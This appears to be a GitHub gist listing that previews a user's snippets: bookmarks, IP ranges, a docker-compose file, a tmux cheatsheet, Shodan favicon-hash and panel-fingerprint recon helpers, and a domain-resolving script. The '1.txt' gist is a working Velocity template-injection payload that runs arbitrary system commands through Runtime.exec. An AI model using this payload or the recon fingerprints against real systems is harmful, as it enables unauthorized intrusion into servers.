Skip to content

Instantly share code, notes, and snippets.

@qqcf
qqcf / index.html
Created October 6, 2025 03:32
我的书签
<!doctype html>
<html lang="zh-CN">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1">
<title>我的书签</title>
<style>
body {
margin:0;
font-family:sans-serif;
8.8.4.0/24
8.8.8.0/24
8.34.208.0/20
8.35.192.0/20
23.236.48.0/20
23.251.128.0/19
34.0.0.0/15
34.2.0.0/16
34.3.0.0/23
34.3.3.0/24
version: '3.7'
services:
typecho:
image: joyqi/typecho:nightly-php7.4-apache
container_name: typecho-server
restart: always
environment:
- TYPECHO_SITE_URL=https://example.com
- TYPECHO_INSTALL=1
#encoding: utf-8
import os
import re
import subprocess
import xml.etree.ElementTree as ET
import sys
# copy from https://tttang.com/archive/1497/
# author: https://tttang.com/user/DVK
@qqcf
qqcf / tmux.md
Created July 31, 2022 09:19 — forked from andreyvit/tmux.md
tmux cheatsheet

tmux cheat sheet

(C-x means ctrl+x, M-x means alt+x)

Prefix key

The default prefix is C-b. If you (or your muscle memory) prefer C-a, you need to add this to ~/.tmux.conf:

remap prefix to Control + a

@qqcf
qqcf / get-shodan-favicon-hash.py
Last active November 19, 2020 07:02 — forked from yehgdotnet/get-shodan-favicon-hash.py
Get Shodan FAVICON Hash
# # https://twitter.com/brsn76945860/status/1171233054951501824
# pip install mmh3
# -----------------------------
# # python 2
# import mmh3
# import requests
# response = requests.get('https://cybersecurity.wtf/favicon.ico')
# favicon = response.content.encode('base64')
@qqcf
qqcf / shodan.md
Last active November 19, 2020 07:01
一些常见的shodan指纹

BT面板

http.favicon.hash:-386189083

SSPANEL

http.favicon.hash:-385909173

@qqcf
qqcf / converter.sh
Last active November 9, 2020 05:54 — forked from xdavidhu/converter.sh
Converter.sh, a bash script to convert domain lists to resolved IP lists without duplicates
#!/bin/bash
# Converter.sh by @xdavidhu
# This is a script inspired by the Bug Hunter's Methodology 3 by @Jhaddix
# With this script, you can convert domain lists to resolved IP lists without duplicates.
# Usage: ./converter.sh [domain-list-file] [output-file]
echo -e "[+] Converter.sh by @xdavidhu\n"
if [ -z "$1" ] || [ -z "$2" ]; then
echo "[!] Usage: ./converter.sh [domain-list-file] [output-file]"
exit 1
@qqcf
qqcf / 1.txt
Last active October 12, 2020 09:32
#set($exp="exp")
#set($a=$exp.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($command))
#set($input=$exp.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a))
#set($sc = $exp.getClass().forName("java.util.Scanner"))
#set($constructor = $sc.getDeclaredConstructor($exp.getClass().forName("java.io.InputStream")))
#set($scan=$constructor.newInstance($input).useDelimiter("\\A"))
#if($scan.hasNext())
$scan.next()
#end
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Console\%SystemRoot%_system32_cmd.exe]
"CodePage"=dword:0000fde9
"FontFamily"=dword:00000036
"FontWeight"=dword:00000190
"FaceName"="Consolas"
"ScreenBufferSize"=dword:232900d2
"WindowSize"=dword:002b00d2